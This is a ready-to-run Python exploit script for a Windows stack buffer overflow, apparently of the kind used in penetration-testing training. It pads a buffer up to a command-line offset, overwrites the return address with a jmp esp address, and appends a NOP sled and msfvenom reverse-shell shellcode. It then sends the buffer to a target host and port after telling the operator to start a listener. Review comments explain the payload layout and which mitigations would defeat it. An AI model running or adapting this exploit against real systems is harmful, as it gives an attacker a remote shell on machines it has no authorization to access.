#!/usr/bin/env python3
from utils import *
import struct
import sys
import os
def exploit(bof_val: int, eip_off: int, jmp_esp: int) -> None:
    """Build a stack-overflow payload and hand it to ``connect_send``.

    Args:
        bof_val: total length, in bytes, the payload is padded out to.
        eip_off: number of filler bytes before the saved return address.
        jmp_esp: address written over the return address; packed little-endian.

    Returns:
        None. The only effects are the console prompt and whatever
        ``connect_send`` (imported from ``utils``, not visible here) does
        with ``target``/``port``, which are module globals set in ``__main__``.
    """
    # Blocks until the operator confirms a listener is up; nothing is sent before this.
    print("[*] Start your listener...")
    input("[!] If your listener is started, press anykey...\n")
    # msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT EXITFUNC=thread -a x86 --platform windows -b "BAD_CHARS" -e x86/shikata_ga_nai -f c
    # Payload is a str of \x escapes (not bytes); according to the comment above it
    # was produced by msfvenom, so its contents are opaque here and not re-derived.
    shellcode= ("\xba\x70\x8e\x20\x12\xdb\xd3\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
        "\x52\x83\xc7\x04\x31\x57\x0e\x03\x27\x80\xc2\xe7\x3b\x74\x80"
        "\x08\xc3\x85\xe5\x81\x26\xb4\x25\xf5\x23\xe7\x95\x7d\x61\x04"
        "\x5d\xd3\x91\x9f\x13\xfc\x96\x28\x99\xda\x99\xa9\xb2\x1f\xb8"
        "\x29\xc9\x73\x1a\x13\x02\x86\x5b\x54\x7f\x6b\x09\x0d\x0b\xde"
        "\xbd\x3a\x41\xe3\x36\x70\x47\x63\xab\xc1\x66\x42\x7a\x59\x31"
        "\x44\x7d\x8e\x49\xcd\x65\xd3\x74\x87\x1e\x27\x02\x16\xf6\x79"
        "\xeb\xb5\x37\xb6\x1e\xc7\x70\x71\xc1\xb2\x88\x81\x7c\xc5\x4f"
        "\xfb\x5a\x40\x4b\x5b\x28\xf2\xb7\x5d\xfd\x65\x3c\x51\x4a\xe1"
        "\x1a\x76\x4d\x26\x11\x82\xc6\xc9\xf5\x02\x9c\xed\xd1\x4f\x46"
        "\x8f\x40\x2a\x29\xb0\x92\x95\x96\x14\xd9\x38\xc2\x24\x80\x54"
        "\x27\x05\x3a\xa5\x2f\x1e\x49\x97\xf0\xb4\xc5\x9b\x79\x13\x12"
        "\xdb\x53\xe3\x8c\x22\x5c\x14\x85\xe0\x08\x44\xbd\xc1\x30\x0f"
        "\x3d\xed\xe4\x80\x6d\x41\x57\x61\xdd\x21\x07\x09\x37\xae\x78"
        "\x29\x38\x64\x11\xc0\xc3\xef\x14\x1c\x03\xc0\x40\x1c\x93\x38"
        "\x9e\xa9\x75\x2c\xb0\xff\x2e\xd9\x29\x5a\xa4\x78\xb5\x70\xc1"
        "\xbb\x3d\x77\x36\x75\xb6\xf2\x24\xe2\x36\x49\x16\xa5\x49\x67"
        "\x3e\x29\xdb\xec\xbe\x24\xc0\xba\xe9\x61\x36\xb3\x7f\x9c\x61"
        "\x6d\x9d\x5d\xf7\x56\x25\xba\xc4\x59\xa4\x4f\x70\x7e\xb6\x89"
        "\x79\x3a\xe2\x45\x2c\x94\x5c\x20\x86\x56\x36\xfa\x75\x31\xde"
        "\x7b\xb6\x82\x98\x83\x93\x74\x44\x35\x4a\xc1\x7b\xfa\x1a\xc5"
        "\x04\xe6\xba\x2a\xdf\xa2\xdb\xc8\xf5\xde\x73\x55\x9c\x62\x1e"
        "\x66\x4b\xa0\x27\xe5\x79\x59\xdc\xf5\x08\x5c\x98\xb1\xe1\x2c"
        "\xb1\x57\x05\x82\xb2\x7d")
    # "<I" packs the address as 4 little-endian bytes; the decode turns them into a
    # 4-character str so it can be concatenated with the other str pieces.
    # NOTE(review): how these code points become wire bytes depends on the encoding
    # connect_send applies — confirm in utils.
    jmp_esp = struct.pack("<I", jmp_esp).decode('raw_unicode_escape')
    # Layout: eip_off filler bytes, 4-byte return address, 16-byte NOP sled,
    # shellcode, then NOP padding so the total length comes out to bof_val.
    # NOTE(review): a hard-coded return address and code executing from the stack
    # presumably assume no ASLR/rebasing and no DEP on the target; those are the
    # mitigations that break this layout, together with stack canaries.
    buffer = "A" * eip_off + jmp_esp + "\x90" * 16 + shellcode + "\x90" * (bof_val - eip_off - 4 - 16 - len(shellcode))
    print("[*] Launching exploit...")
    # target and port are module globals assigned in the __main__ block.
    connect_send(target, port, buffer)
if __name__ == "__main__":
    # Five positional arguments are required in addition to the script name.
    if len(sys.argv) != 6:
        print("[!] Usage: {} 'target' 'port' 'overflow value' 'eip offset' 'jmp_esp_address' ".format(sys.argv[0]))
        sys.exit(1)
    # Bind by unpacking; `target` and `port` stay module globals because
    # exploit() reads them when calling connect_send().
    _script, target, port_arg, bof_arg, eip_arg, jmp_arg = sys.argv
    port = int(port_arg)
    bof_val = int(bof_arg)
    eip_off = int(eip_arg)
    jmp_esp = int(jmp_arg, 16)  # the address argument is parsed as base-16
    exploit(bof_val, eip_off, jmp_esp)